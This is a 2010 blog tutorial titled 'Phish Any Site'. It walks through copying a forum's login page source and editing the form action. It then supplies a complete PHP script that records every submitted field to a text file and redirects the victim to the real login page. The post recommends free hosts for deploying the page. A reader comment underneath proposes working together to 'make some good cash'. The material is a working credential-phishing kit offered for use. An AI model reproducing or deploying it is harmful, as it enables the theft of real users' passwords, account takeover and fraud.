Saturday 21 August 2010

Phish Any Site

go to "www.site.com/forum" and right click on some white space on the page and press "view source code". You got source code of that site, copy it all to notepad.

Now we need to change a few things in the code. So that the login button sends the info to our file instead of the Original site login. We do that by editing the action of the code. So press Edit >> search. and search "action=" without the quotes.You will find something like this.

Code:
<form action="http://site.com/forum/index.php? " method="post">


You have to change it to 'action="next.php" '. after you have done that, you should change the "get" instead of "post", or else it will not work. Save the document as "index.php" (or any name.php not htm!)

Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:

Code:
<?php
header("Location: http://www.site.com/forum/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Save this as "next.php"
Code:
header("Location: http://www.site.com/forum/login.php ");


You have to Edit it to forum link

Open Notepad again and save the Blank page as passwords.txt (Here the passwords will come)
You can rename passwords.txt to any name.txt but you have to Edit the next.php.

Code:
$handle = fopen("passwords.txt", "a");



"passwords.txt" to anyother name that u want.

Upload the 3 files "index.php", "next.php" and "passwords.txt" (or whatever the password file is called) to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, t35.com or 007sites.com. When you made an account you should upload the 3 files.

Cheers! Now you have a Working Phisher of your Victim forum (Site)

Thanks for reading the Tutorial.

1 comments:

Adrian said...

Hi bro,
Thanks for the tutorial, it was cool.
Anyways i tried it but i didn't get it as its my first time ever to do such.

I have a few things i will like us to do together bro, please get in touch and i will let you know what we need do to make some good cash together.

Email : bryanmolina55@yahoo.com

Peace out..
Bryan

Post a Comment

Related Posts Plugin for WordPress, Blogger...
Twitter Delicious Facebook Digg Stumbleupon Favorites More